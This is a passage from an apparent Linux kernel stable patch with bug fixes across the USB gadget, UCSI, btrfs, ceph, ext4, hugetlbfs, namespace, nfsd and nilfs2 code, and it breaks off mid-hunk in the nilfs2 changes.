++++ b/drivers/usb/gadget/function/f_mass_storage.c
+@@ -544,21 +544,37 @@ static int start_transfer(struct fsg_dev *fsg, struct usb_ep *ep,
+ 
+ static bool start_in_transfer(struct fsg_common *common, struct fsg_buffhd *bh)
+ {
++	int rc;
++
+ 	if (!fsg_is_set(common))
+ 		return false;
+ 	bh->state = BUF_STATE_SENDING;
+-	if (start_transfer(common->fsg, common->fsg->bulk_in, bh->inreq))
++	rc = start_transfer(common->fsg, common->fsg->bulk_in, bh->inreq);
++	if (rc) {
+ 		bh->state = BUF_STATE_EMPTY;
++		if (rc == -ESHUTDOWN) {
++			common->running = 0;
++			return false;
++		}
++	}
+ 	return true;
+ }
+ 
+ static bool start_out_transfer(struct fsg_common *common, struct fsg_buffhd *bh)
+ {
++	int rc;
++
+ 	if (!fsg_is_set(common))
+ 		return false;
+ 	bh->state = BUF_STATE_RECEIVING;
+-	if (start_transfer(common->fsg, common->fsg->bulk_out, bh->outreq))
++	rc = start_transfer(common->fsg, common->fsg->bulk_out, bh->outreq);
++	if (rc) {
+ 		bh->state = BUF_STATE_FULL;
++		if (rc == -ESHUTDOWN) {
++			common->running = 0;
++			return false;
++		}
++	}
+ 	return true;
+ }
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index dc2dea3768fb6..0695ee54ff781 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -831,7 +831,9 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 
+ 	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+ 
++	mutex_lock(&ucsi->ppm_lock);
+ 	ret = ucsi_acknowledge_connector_change(ucsi);
++	mutex_unlock(&ucsi->ppm_lock);
+ 	if (ret)
+ 		dev_err(ucsi->dev, "%s: ACK failed (%d)", __func__, ret);
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 217355f1f9b94..26171c5d3c61c 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -73,9 +73,13 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 				const void *val, size_t val_len)
+ {
+ 	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
++	bool ack = UCSI_COMMAND(*(u64 *)val) == UCSI_ACK_CC_CI;
+ 	int ret;
+ 
+-	set_bit(COMMAND_PENDING, &ua->flags);
++	if (ack)
++		set_bit(ACK_PENDING, &ua->flags);
++	else
++		set_bit(COMMAND_PENDING, &ua->flags);
+ 
+ 	ret = ucsi_acpi_async_write(ucsi, offset, val, val_len);
+ 	if (ret)
+@@ -85,7 +89,10 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 		ret = -ETIMEDOUT;
+ 
+ out_clear_bit:
+-	clear_bit(COMMAND_PENDING, &ua->flags);
++	if (ack)
++		clear_bit(ACK_PENDING, &ua->flags);
++	else
++		clear_bit(COMMAND_PENDING, &ua->flags);
+ 
+ 	return ret;
+ }
+@@ -142,8 +149,10 @@ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 	if (UCSI_CCI_CONNECTOR(cci))
+ 		ucsi_connector_change(ua->ucsi, UCSI_CCI_CONNECTOR(cci));
+ 
+-	if (test_bit(COMMAND_PENDING, &ua->flags) &&
+-	    cci & (UCSI_CCI_ACK_COMPLETE | UCSI_CCI_COMMAND_COMPLETE))
++	if (cci & UCSI_CCI_ACK_COMPLETE && test_bit(ACK_PENDING, &ua->flags))
++		complete(&ua->complete);
++	if (cci & UCSI_CCI_COMMAND_COMPLETE &&
++	    test_bit(COMMAND_PENDING, &ua->flags))
+ 		complete(&ua->complete);
+ }
+ 
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 08017b180a10d..9f77565bd7f5a 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1318,6 +1318,7 @@ static bool clean_pinned_extents(struct btrfs_trans_handle *trans,
+  */
+ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ {
++	LIST_HEAD(retry_list);
+ 	struct btrfs_block_group *block_group;
+ 	struct btrfs_space_info *space_info;
+ 	struct btrfs_trans_handle *trans;
+@@ -1339,6 +1340,7 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 
+ 	spin_lock(&fs_info->unused_bgs_lock);
+ 	while (!list_empty(&fs_info->unused_bgs)) {
++		u64 used;
+ 		int trimming;
+ 
+ 		block_group = list_first_entry(&fs_info->unused_bgs,
+@@ -1374,9 +1376,9 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 			goto next;
+ 		}
+ 
++		spin_lock(&space_info->lock);
+ 		spin_lock(&block_group->lock);
+-		if (block_group->reserved || block_group->pinned ||
+-		    block_group->used || block_group->ro ||
++		if (btrfs_is_block_group_used(block_group) || block_group->ro ||
+ 		    list_is_singular(&block_group->list)) {
+ 			/*
+ 			 * We want to bail if we made new allocations or have
+@@ -1386,10 +1388,49 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 			 */
+ 			trace_btrfs_skip_unused_block_group(block_group);
+ 			spin_unlock(&block_group->lock);
++			spin_unlock(&space_info->lock);
++			up_write(&space_info->groups_sem);
++			goto next;
++		}
++
++		/*
++		 * The block group may be unused but there may be space reserved
++		 * accounting with the existence of that block group, that is,
++		 * space_info->bytes_may_use was incremented by a task but no
++		 * space was yet allocated from the block group by the task.
++		 * That space may or may not be allocated, as we are generally
++		 * pessimistic about space reservation for metadata as well as
++		 * for data when using compression (as we reserve space based on
++		 * the worst case, when data can't be compressed, and before
++		 * actually attempting compression, before starting writeback).
++		 *
++		 * So check if the total space of the space_info minus the size
++		 * of this block group is less than the used space of the
++		 * space_info - if that's the case, then it means we have tasks
++		 * that might be relying on the block group in order to allocate
++		 * extents, and add back the block group to the unused list when
++		 * we finish, so that we retry later in case no tasks ended up
++		 * needing to allocate extents from the block group.
++		 */
++		used = btrfs_space_info_used(space_info, true);
++		if (space_info->total_bytes - block_group->length < used) {
++			/*
++			 * Add a reference for the list, compensate for the ref
++			 * drop under the "next" label for the
++			 * fs_info->unused_bgs list.
++			 */
++			btrfs_get_block_group(block_group);
++			list_add_tail(&block_group->bg_list, &retry_list);
++
++			trace_btrfs_skip_unused_block_group(block_group);
++			spin_unlock(&block_group->lock);
++			spin_unlock(&space_info->lock);
+ 			up_write(&space_info->groups_sem);
+ 			goto next;
+ 		}
++
+ 		spin_unlock(&block_group->lock);
++		spin_unlock(&space_info->lock);
+ 
+ 		/* We don't want to force the issue, only flip if it's ok. */
+ 		ret = inc_block_group_ro(block_group, 0);
+@@ -1513,12 +1554,16 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 		btrfs_put_block_group(block_group);
+ 		spin_lock(&fs_info->unused_bgs_lock);
+ 	}
++	list_splice_tail(&retry_list, &fs_info->unused_bgs);
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 	return;
+ 
+ flip_async:
+ 	btrfs_end_transaction(trans);
++	spin_lock(&fs_info->unused_bgs_lock);
++	list_splice_tail(&retry_list, &fs_info->unused_bgs);
++	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 	btrfs_put_block_group(block_group);
+ 	btrfs_discard_punt_unused_bgs_list(fs_info);
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index 47a2dcbfee255..bace40a006379 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -241,6 +241,13 @@ static inline u64 btrfs_block_group_end(struct btrfs_block_group *block_group)
+ 	return (block_group->start + block_group->length);
+ }
+ 
++static inline bool btrfs_is_block_group_used(const struct btrfs_block_group *bg)
++{
++	lockdep_assert_held(&bg->lock);
++
++	return (bg->used > 0 || bg->reserved > 0 || bg->pinned > 0);
++}
++
+ static inline bool btrfs_is_block_group_data_only(
+ 					struct btrfs_block_group *block_group)
+ {
+diff --git a/fs/btrfs/delalloc-space.c b/fs/btrfs/delalloc-space.c
+index f2bc5563c0f92..63b7fa7067434 100644
+--- a/fs/btrfs/delalloc-space.c
++++ b/fs/btrfs/delalloc-space.c
+@@ -243,7 +243,6 @@ static void btrfs_calculate_inode_block_rsv_size(struct btrfs_fs_info *fs_info,
+ 	struct btrfs_block_rsv *block_rsv = &inode->block_rsv;
+ 	u64 reserve_size = 0;
+ 	u64 qgroup_rsv_size = 0;
+-	u64 csum_leaves;
+ 	unsigned outstanding_extents;
+ 
+ 	lockdep_assert_held(&inode->lock);
+@@ -258,10 +257,12 @@ static void btrfs_calculate_inode_block_rsv_size(struct btrfs_fs_info *fs_info,
+ 						outstanding_extents);
+ 		reserve_size += btrfs_calc_metadata_size(fs_info, 1);
+ 	}
+-	csum_leaves = btrfs_csum_bytes_to_leaves(fs_info,
+-						 inode->csum_bytes);
+-	reserve_size += btrfs_calc_insert_metadata_size(fs_info,
+-							csum_leaves);
++	if (!(inode->flags & BTRFS_INODE_NODATASUM)) {
++		u64 csum_leaves;
++
++		csum_leaves = btrfs_csum_bytes_to_leaves(fs_info, inode->csum_bytes);
++		reserve_size += btrfs_calc_insert_metadata_size(fs_info, csum_leaves);
++	}
+ 	/*
+ 	 * For qgroup rsv, the calculation is very simple:
+ 	 * account one nodesize for each outstanding extent
+@@ -276,14 +277,20 @@ static void btrfs_calculate_inode_block_rsv_size(struct btrfs_fs_info *fs_info,
+ 	spin_unlock(&block_rsv->lock);
+ }
+ 
+-static void calc_inode_reservations(struct btrfs_fs_info *fs_info,
++static void calc_inode_reservations(struct btrfs_inode *inode,
+ 				    u64 num_bytes, u64 disk_num_bytes,
+ 				    u64 *meta_reserve, u64 *qgroup_reserve)
+ {
++	struct btrfs_fs_info *fs_info = inode->root->fs_info;
+ 	u64 nr_extents = count_max_extents(fs_info, num_bytes);
+-	u64 csum_leaves = btrfs_csum_bytes_to_leaves(fs_info, disk_num_bytes);
++	u64 csum_leaves;
+ 	u64 inode_update = btrfs_calc_metadata_size(fs_info, 1);
+ 
++	if (inode->flags & BTRFS_INODE_NODATASUM)
++		csum_leaves = 0;
++	else
++		csum_leaves = btrfs_csum_bytes_to_leaves(fs_info, disk_num_bytes);
++
+ 	*meta_reserve = btrfs_calc_insert_metadata_size(fs_info,
+ 						nr_extents + csum_leaves);
+ 
+@@ -335,7 +342,7 @@ int btrfs_delalloc_reserve_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 	 * everything out and try again, which is bad.  This way we just
+ 	 * over-reserve slightly, and clean up the mess when we are done.
+ 	 */
+-	calc_inode_reservations(fs_info, num_bytes, disk_num_bytes,
++	calc_inode_reservations(inode, num_bytes, disk_num_bytes,
+ 				&meta_reserve, &qgroup_reserve);
+ 	ret = btrfs_qgroup_reserve_meta_prealloc(root, qgroup_reserve, true,
+ 						 noflush);
+@@ -356,7 +363,8 @@ int btrfs_delalloc_reserve_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 	spin_lock(&inode->lock);
+ 	nr_extents = count_max_extents(fs_info, num_bytes);
+ 	btrfs_mod_outstanding_extents(inode, nr_extents);
+-	inode->csum_bytes += disk_num_bytes;
++	if (!(inode->flags & BTRFS_INODE_NODATASUM))
++		inode->csum_bytes += disk_num_bytes;
+ 	btrfs_calculate_inode_block_rsv_size(fs_info, inode);
+ 	spin_unlock(&inode->lock);
+ 
+@@ -390,7 +398,8 @@ void btrfs_delalloc_release_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 
+ 	num_bytes = ALIGN(num_bytes, fs_info->sectorsize);
+ 	spin_lock(&inode->lock);
+-	inode->csum_bytes -= num_bytes;
++	if (!(inode->flags & BTRFS_INODE_NODATASUM))
++		inode->csum_bytes -= num_bytes;
+ 	btrfs_calculate_inode_block_rsv_size(fs_info, inode);
+ 	spin_unlock(&inode->lock);
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 40152458e7b74..0d1b05ded1e35 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1662,8 +1662,17 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ again:
+ 	root = btrfs_lookup_fs_root(fs_info, objectid);
+ 	if (root) {
+-		/* Shouldn't get preallocated anon_dev for cached roots */
+-		ASSERT(!anon_dev);
++		/*
++		 * Some other caller may have read out the newly inserted
++		 * subvolume already (for things like backref walk etc).  Not
++		 * that common but still possible.  In that case, we just need
++		 * to free the anon_dev.
++		 */
++		if (unlikely(anon_dev)) {
++			free_anon_bdev(anon_dev);
++			anon_dev = 0;
++		}
++
+ 		if (check_ref && btrfs_root_refs(&root->root_item) == 0) {
+ 			btrfs_put_root(root);
+ 			return ERR_PTR(-ENOENT);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 82f92b5652a77..f7f4bcc094642 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3364,8 +3364,23 @@ int btrfs_finish_ordered_io(struct btrfs_ordered_extent *ordered_extent)
+ 			unwritten_start += logical_len;
+ 		clear_extent_uptodate(io_tree, unwritten_start, end, NULL);
+ 
+-		/* Drop extent maps for the part of the extent we didn't write. */
+-		btrfs_drop_extent_map_range(inode, unwritten_start, end, false);
++		/*
++		 * Drop extent maps for the part of the extent we didn't write.
++		 *
++		 * We have an exception here for the free_space_inode, this is
++		 * because when we do btrfs_get_extent() on the free space inode
++		 * we will search the commit root.  If this is a new block group
++		 * we won't find anything, and we will trip over the assert in
++		 * writepage where we do ASSERT(em->block_start !=
++		 * EXTENT_MAP_HOLE).
++		 *
++		 * Theoretically we could also skip this for any NOCOW extent as
++		 * we don't mess with the extent map tree in the NOCOW case, but
++		 * for now simply skip this if we are the free space inode.
++		 */
++		if (!btrfs_is_free_space_inode(inode))
++			btrfs_drop_extent_map_range(inode, unwritten_start,
++						    end, false);
+ 
+ 		/*
+ 		 * If the ordered extent had an IOERR or something else went
+@@ -10774,6 +10789,13 @@ ssize_t btrfs_do_encoded_write(struct kiocb *iocb, struct iov_iter *from,
+ 	if (encoded->encryption != BTRFS_ENCODED_IO_ENCRYPTION_NONE)
+ 		return -EINVAL;
+ 
++	/*
++	 * Compressed extents should always have checksums, so error out if we
++	 * have a NOCOW file or inode was created while mounted with NODATASUM.
++	 */
++	if (inode->flags & BTRFS_INODE_NODATASUM)
++		return -EINVAL;
++
+ 	orig_count = iov_iter_count(from);
+ 
+ 	/* The extent size must be sane. */
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 8516c70b5edc1..196e222749ccd 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -4695,6 +4695,11 @@ static long btrfs_ioctl_qgroup_create(struct file *file, void __user *arg)
+ 		goto out;
+ 	}
+ 
++	if (sa->create && is_fstree(sa->qgroupid)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	trans = btrfs_join_transaction(root);
+ 	if (IS_ERR(trans)) {
+ 		ret = PTR_ERR(trans);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 96ec9ccc2ef61..b3472bf6b288f 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1635,6 +1635,15 @@ int btrfs_create_qgroup(struct btrfs_trans_handle *trans, u64 qgroupid)
+ 	return ret;
+ }
+ 
++static bool qgroup_has_usage(struct btrfs_qgroup *qgroup)
++{
++	return (qgroup->rfer > 0 || qgroup->rfer_cmpr > 0 ||
++		qgroup->excl > 0 || qgroup->excl_cmpr > 0 ||
++		qgroup->rsv.values[BTRFS_QGROUP_RSV_DATA] > 0 ||
++		qgroup->rsv.values[BTRFS_QGROUP_RSV_META_PREALLOC] > 0 ||
++		qgroup->rsv.values[BTRFS_QGROUP_RSV_META_PERTRANS] > 0);
++}
++
+ int btrfs_remove_qgroup(struct btrfs_trans_handle *trans, u64 qgroupid)
+ {
+ 	struct btrfs_fs_info *fs_info = trans->fs_info;
+@@ -1654,6 +1663,11 @@ int btrfs_remove_qgroup(struct btrfs_trans_handle *trans, u64 qgroupid)
+ 		goto out;
+ 	}
+ 
++	if (is_fstree(qgroupid) && qgroup_has_usage(qgroup)) {
++		ret = -EBUSY;
++		goto out;
++	}
++
+ 	/* Check if there are no children of this qgroup */
+ 	if (!list_empty(&qgroup->members)) {
+ 		ret = -EBUSY;
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 4a4d65b5e24f7..a75669972dc73 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7852,7 +7852,7 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	}
+ 
+ 	if (arg->flags & ~BTRFS_SEND_FLAG_MASK) {
+-		ret = -EINVAL;
++		ret = -EOPNOTSUPP;
+ 		goto out;
+ 	}
+ 
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 111938a6307e6..57603782e7e2a 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -1391,7 +1391,7 @@ static void __prep_cap(struct cap_msg_args *arg, struct ceph_cap *cap,
+ 	if (flushing & CEPH_CAP_XATTR_EXCL) {
+ 		arg->old_xattr_buf = __ceph_build_xattrs_blob(ci);
+ 		arg->xattr_version = ci->i_xattrs.version;
+-		arg->xattr_buf = ci->i_xattrs.blob;
++		arg->xattr_buf = ceph_buffer_get(ci->i_xattrs.blob);
+ 	} else {
+ 		arg->xattr_buf = NULL;
+ 		arg->old_xattr_buf = NULL;
+@@ -1457,6 +1457,7 @@ static void __send_cap(struct cap_msg_args *arg, struct ceph_inode_info *ci)
+ 	encode_cap_msg(msg, arg);
+ 	ceph_con_send(&arg->session->s_con, msg);
+ 	ceph_buffer_put(arg->old_xattr_buf);
++	ceph_buffer_put(arg->xattr_buf);
+ 	if (arg->wake)
+ 		wake_up_all(&ci->i_cap_wq);
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 40903c172a34f..1a310ee7d9e55 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -1785,11 +1785,6 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 	mb_check_buddy(e4b);
+ 	mb_free_blocks_double(inode, e4b, first, count);
+ 
+-	this_cpu_inc(discard_pa_seq);
+-	e4b->bd_info->bb_free += count;
+-	if (first < e4b->bd_info->bb_first_free)
+-		e4b->bd_info->bb_first_free = first;
+-
+ 	/* access memory sequentially: check left neighbour,
+ 	 * clear range and then check right neighbour
+ 	 */
+@@ -1803,23 +1798,31 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 		struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 		ext4_fsblk_t blocknr;
+ 
++		/*
++		 * Fastcommit replay can free already freed blocks which
++		 * corrupts allocation info. Regenerate it.
++		 */
++		if (sbi->s_mount_state & EXT4_FC_REPLAY) {
++			mb_regenerate_buddy(e4b);
++			goto check;
++		}
++
+ 		blocknr = ext4_group_first_block_no(sb, e4b->bd_group);
+ 		blocknr += EXT4_C2B(sbi, block);
+-		if (!(sbi->s_mount_state & EXT4_FC_REPLAY)) {
+-			ext4_grp_locked_error(sb, e4b->bd_group,
+-					      inode ? inode->i_ino : 0,
+-					      blocknr,
+-					      "freeing already freed block (bit %u); block bitmap corrupt.",
+-					      block);
+-			ext4_mark_group_bitmap_corrupted(
+-				sb, e4b->bd_group,
++		ext4_grp_locked_error(sb, e4b->bd_group,
++				      inode ? inode->i_ino : 0, blocknr,
++				      "freeing already freed block (bit %u); block bitmap corrupt.",
++				      block);
++		ext4_mark_group_bitmap_corrupted(sb, e4b->bd_group,
+ 				EXT4_GROUP_INFO_BBITMAP_CORRUPT);
+-		} else {
+-			mb_regenerate_buddy(e4b);
+-		}
+-		goto done;
++		return;
+ 	}
+ 
++	this_cpu_inc(discard_pa_seq);
++	e4b->bd_info->bb_free += count;
++	if (first < e4b->bd_info->bb_first_free)
++		e4b->bd_info->bb_first_free = first;
++
+ 	/* let's maintain fragments counter */
+ 	if (left_is_free && right_is_free)
+ 		e4b->bd_info->bb_fragments--;
+@@ -1844,9 +1847,9 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 	if (first <= last)
+ 		mb_buddy_mark_free(e4b, first >> 1, last >> 1);
+ 
+-done:
+ 	mb_set_largest_free_order(sb, e4b->bd_info);
+ 	mb_update_avg_fragment_size(sb, e4b->bd_info);
++check:
+ 	mb_check_buddy(e4b);
+ }
+ 
+diff --git a/fs/ext4/move_extent.c b/fs/ext4/move_extent.c
+index dedc9d445f243..8e3ff150bc36b 100644
+--- a/fs/ext4/move_extent.c
++++ b/fs/ext4/move_extent.c
+@@ -621,6 +621,7 @@ ext4_move_extents(struct file *o_filp, struct file *d_filp, __u64 orig_blk,
+ 		goto out;
+ 	o_end = o_start + len;
+ 
++	*moved_len = 0;
+ 	while (o_start < o_end) {
+ 		struct ext4_extent *ex;
+ 		ext4_lblk_t cur_blk, next_blk;
+@@ -675,7 +676,7 @@ ext4_move_extents(struct file *o_filp, struct file *d_filp, __u64 orig_blk,
+ 		 */
+ 		ext4_double_up_write_data_sem(orig_inode, donor_inode);
+ 		/* Swap original branches with new branches */
+-		move_extent_per_page(o_filp, donor_inode,
++		*moved_len += move_extent_per_page(o_filp, donor_inode,
+ 				     orig_page_index, donor_page_index,
+ 				     offset_in_page, cur_len,
+ 				     unwritten, &ret);
+@@ -685,9 +686,6 @@ ext4_move_extents(struct file *o_filp, struct file *d_filp, __u64 orig_blk,
+ 		o_start += cur_len;
+ 		d_start += cur_len;
+ 	}
+-	*moved_len = o_start - orig_blk;
+-	if (*moved_len > len)
+-		*moved_len = len;
+ 
+ out:
+ 	if (*moved_len) {
+diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
+index 8eea709e36599..4fe4b3393e71c 100644
+--- a/fs/hugetlbfs/inode.c
++++ b/fs/hugetlbfs/inode.c
+@@ -123,6 +123,7 @@ static int hugetlbfs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 	loff_t len, vma_len;
+ 	int ret;
+ 	struct hstate *h = hstate_file(file);
++	vm_flags_t vm_flags;
+ 
+ 	/*
+ 	 * vma address alignment (but not the pgoff alignment) has
+@@ -164,10 +165,20 @@ static int hugetlbfs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 	file_accessed(file);
+ 
+ 	ret = -ENOMEM;
++
++	vm_flags = vma->vm_flags;
++	/*
++	 * for SHM_HUGETLB, the pages are reserved in the shmget() call so skip
++	 * reserving here. Note: only for SHM hugetlbfs file, the inode
++	 * flag S_PRIVATE is set.
++	 */
++	if (inode->i_flags & S_PRIVATE)
++		vm_flags |= VM_NORESERVE;
++
+ 	if (!hugetlb_reserve_pages(inode,
+ 				vma->vm_pgoff >> huge_page_order(h),
+ 				len >> huge_page_shift(h), vma,
+-				vma->vm_flags))
++				vm_flags))
+ 		goto out;
+ 
+ 	ret = 0;
+@@ -1350,6 +1361,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ {
+ 	struct hugetlbfs_fs_context *ctx = fc->fs_private;
+ 	struct fs_parse_result result;
++	struct hstate *h;
+ 	char *rest;
+ 	unsigned long ps;
+ 	int opt;
+@@ -1394,11 +1406,12 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_pagesize:
+ 		ps = memparse(param->string, &rest);
+-		ctx->hstate = size_to_hstate(ps);
+-		if (!ctx->hstate) {
++		h = size_to_hstate(ps);
++		if (!h) {
+ 			pr_err("Unsupported page size %lu MB\n", ps / SZ_1M);
+ 			return -EINVAL;
+ 		}
++		ctx->hstate = h;
+ 		return 0;
+ 
+ 	case Opt_min_size:
+diff --git a/fs/namespace.c b/fs/namespace.c
+index 29a8d90dd1072..1533550f73567 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -4172,10 +4172,15 @@ static int do_mount_setattr(struct path *path, struct mount_kattr *kattr)
+ 	/*
+ 	 * If this is an attached mount make sure it's located in the callers
+ 	 * mount namespace. If it's not don't let the caller interact with it.
+-	 * If this is a detached mount make sure it has an anonymous mount
+-	 * namespace attached to it, i.e. we've created it via OPEN_TREE_CLONE.
++	 *
++	 * If this mount doesn't have a parent it's most often simply a
++	 * detached mount with an anonymous mount namespace. IOW, something
++	 * that's simply not attached yet. But there are apparently also users
++	 * that do change mount properties on the rootfs itself. That obviously
++	 * neither has a parent nor is it a detached mount so we cannot
++	 * unconditionally check for detached mounts.
+ 	 */
+-	if (!(mnt_has_parent(mnt) ? check_mnt(mnt) : is_anon_ns(mnt->mnt_ns)))
++	if ((mnt_has_parent(mnt) || !is_anon_ns(mnt->mnt_ns)) && !check_mnt(mnt))
+ 		goto out;
+ 
+ 	/*
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index faecdbfa01a29..b3f6dda930d8b 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -4908,10 +4908,8 @@ nfsd_break_deleg_cb(struct file_lock *fl)
+ 	 */
+ 	fl->fl_break_time = 0;
+ 
+-	spin_lock(&fp->fi_lock);
+ 	fp->fi_had_conflict = true;
+ 	nfsd_break_one_deleg(dp);
+-	spin_unlock(&fp->fi_lock);
+ 	return false;
+ }
+ 
+@@ -5499,12 +5497,13 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	if (status)
+ 		goto out_unlock;
+ 
++	status = -EAGAIN;
++	if (fp->fi_had_conflict)
++		goto out_unlock;
++
+ 	spin_lock(&state_lock);
+ 	spin_lock(&fp->fi_lock);
+-	if (fp->fi_had_conflict)
+-		status = -EAGAIN;
+-	else
+-		status = hash_delegation_locked(dp, fp);
++	status = hash_delegation_locked(dp, fp);
+ 	spin_unlock(&fp->fi_lock);
+ 	spin_unlock(&state_lock);
+ 
+@@ -7736,14 +7735,16 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ {
+ 	struct file_lock *fl;
+ 	int status = false;
+-	struct nfsd_file *nf = find_any_file(fp);
++	struct nfsd_file *nf;
+ 	struct inode *inode;
+ 	struct file_lock_context *flctx;
+ 
++	spin_lock(&fp->fi_lock);
++	nf = find_any_file_locked(fp);
+ 	if (!nf) {
+ 		/* Any valid lock stateid should have some sort of access */
+ 		WARN_ON_ONCE(1);
+-		return status;
++		goto out;
+ 	}
+ 
+ 	inode = locks_inode(nf->nf_file);
+@@ -7759,7 +7760,8 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ 		}
+ 		spin_unlock(&flctx->flc_lock);
+ 	}
+-	nfsd_file_put(nf);
++out:
++	spin_unlock(&fp->fi_lock);
+ 	return status;
+ }
+ 
+@@ -7769,10 +7771,8 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+  * @cstate: NFSv4 COMPOUND state
+  * @u: RELEASE_LOCKOWNER arguments
+  *
+- * The lockowner's so_count is bumped when a lock record is added
+- * or when copying a conflicting lock. The latter case is brief,
+- * but can lead to fleeting false positives when looking for
+- * locks-in-use.
++ * Check if theree are any locks still held and if not - free the lockowner
++ * and any lock state that is owned.
+  *
+  * Return values:
+  *   %nfs_ok: lockowner released or not found
+@@ -7808,10 +7808,13 @@ nfsd4_release_lockowner(struct svc_rqst *rqstp,
+ 		spin_unlock(&clp->cl_lock);
+ 		return nfs_ok;
+ 	}
+-	if (atomic_read(&lo->lo_owner.so_count) != 2) {
+-		spin_unlock(&clp->cl_lock);
+-		nfs4_put_stateowner(&lo->lo_owner);
+-		return nfserr_locks_held;
++
++	list_for_each_entry(stp, &lo->lo_owner.so_stateids, st_perstateowner) {
++		if (check_for_locks(stp->st_stid.sc_file, lo)) {
++			spin_unlock(&clp->cl_lock);
++			nfs4_put_stateowner(&lo->lo_owner);
++			return nfserr_locks_held;
++		}
+ 	}
+ 	unhash_lockowner_locked(lo);
+ 	while (!list_empty(&lo->lo_owner.so_stateids)) {
+diff --git a/fs/nilfs2/dat.c b/fs/nilfs2/dat.c
+index 9930fa901039f..1e7f653c1df7e 100644
+--- a/fs/nilfs2/dat.c
++++ b/fs/nilfs2/dat.c
+@@ -40,8 +40,21 @@ static inline struct nilfs_dat_info *NILFS_DAT_I(struct inode *dat)
+ static int nilfs_dat_prepare_entry(struct inode *dat,
+ 				   struct nilfs_palloc_req *req, int create)
+ {
+-	return nilfs_palloc_get_entry_block(dat, req->pr_entry_nr,
+-					    create, &req->pr_entry_bh);
++	int ret;
++
++	ret = nilfs_palloc_get_entry_block(dat, req->pr_entry_nr,
++					   create, &req->pr_entry_bh);
++	if (unlikely(ret == -ENOENT)) {
++		nilfs_err(dat->i_sb,
++			  "DAT doesn't have a block to manage vblocknr = %llu",
++			  (unsigned long long)req->pr_entry_nr);
++		/*
++		 * Return internal code -EINVAL to notify bmap layer of
++		 * metadata corruption.
++		 */
++		ret = -EINVAL;
++	}
++	return ret;
+ }
+ 
+ static void nilfs_dat_commit_entry(struct inode *dat,
+@@ -123,11 +136,7 @@ static void nilfs_dat_commit_free(struct inode *dat,
+ 
